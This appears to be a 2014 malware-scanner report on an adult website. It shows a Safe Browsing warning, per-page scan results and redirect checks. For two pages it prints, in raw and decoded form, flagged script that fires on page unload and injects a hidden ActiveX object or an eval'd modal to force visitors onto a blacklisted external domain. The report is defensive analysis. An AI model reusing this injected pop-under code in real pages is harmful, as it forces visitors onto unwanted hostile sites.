Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ww2.sexyjelenajensen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ww2.sexyjelenajensen.com/ | 200 OK Content-Length: 12182 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.wantboobs.com var exit = true; function pop () { if(exit){ var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2){ document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } if(exit){ eval("window.attachEvent('onunload',pop);"); } Decoded script: window.attachEvent('onunload',pop); window.attachEvent('onunload',pop); function pop() { if (exit) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = window.navigator.userAgent.indexOf("SV1") != -1; if (isXPSP2) { document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } | ||
http://ww2.sexyjelenajensen.com/tour.html | 200 OK Content-Length: 6492 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: www.wantboobs.com var exit = true; function pop () { if(exit){ var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1); if(isXPSP2){ document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } if(exit){ eval("window.attachEvent('onunload',pop);"); } Decoded script: window.attachEvent('onunload',pop); window.attachEvent('onunload',pop); function pop() { if (exit) { var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6"; var isXPSP2 = window.navigator.userAgent.indexOf("SV1") != -1; if (isXPSP2) { document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>"; iie.launchURL("http://www.wantboobs.com/trial.htm"); } else { eval("window.showModalDialog('http://www.wantboobs.com/trial.htm','','dialogWidth:780px; dialogHeight:600px;'"); } } } | ||
http://www.iloveboobs.com/wbbigtits.js | 200 OK Content-Length: 2516 Content-Type: application/x-javascript | clean |
http://ww2.sexyjelenajensen.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 08 Apr 2014 03:14:05 GMT Location: http://ww2.sexyjelenajensen.com Server: Apache/2.2.3 (CentOS) Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ww2.sexyjelenajensen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 03:14:04 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: ww2.sexyjelenajensen.com
Referer: http://www.google.com/search?q=ww2.sexyjelenajensen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.